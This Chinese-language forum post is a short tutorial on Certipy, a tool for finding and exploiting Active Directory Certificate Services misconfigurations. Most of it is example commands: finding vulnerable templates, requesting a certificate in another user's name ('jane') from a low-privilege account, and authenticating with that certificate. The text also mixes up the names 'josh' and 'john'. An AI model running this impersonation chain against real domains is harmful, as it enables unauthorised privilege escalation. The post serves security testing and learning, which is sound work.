介绍:
Certipy是一款基于Python开发的强大工具,旨在帮助研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。
![图片[1]-AD错误配置项检查工具Certipy的使用-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/04/20240403191428210-image.png)
下载:
<code>git clone https://github.com/ly4k/Certipy.git python3 setup.py install</code>使用方法:
查找漏洞模板:使用 -vulnerable 参数搜索存在漏洞的证书模板:
<code>certipy 'predator/john:Passw0rd@dc.predator.local' find -vulnerable</code>自动化:在下面的示例中,用户john是一个低权限用户,可以注册Copy of Web Server模板:
<code>certipy 'predator/john:Passw0rd@dc.predator.local' auto</code>查询请求:用户josh将以用户jane的身份请求一个有效的身份认证证书:
<code>certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'</code>身份认证:用户jane将使用已获得的证书进行身份认证:
<code>certipy 'predator/jane@dc.predator.local' auth -cert ./2.crt -key ./2.key</code>![图片[2]-AD错误配置项检查工具Certipy的使用-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/04/20240403191211796-image.png)
结果示例:
如果Certipy检测到目标存在漏洞,将会提供相应的结果,可以根据GitHub上的步骤逐步操作:
https://github.com/ly4k/Certipy#domain-escalation
![图片[3]-AD错误配置项检查工具Certipy的使用-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/04/20240403191346295-image.png)
© 版权声明
THE END
暂无评论内容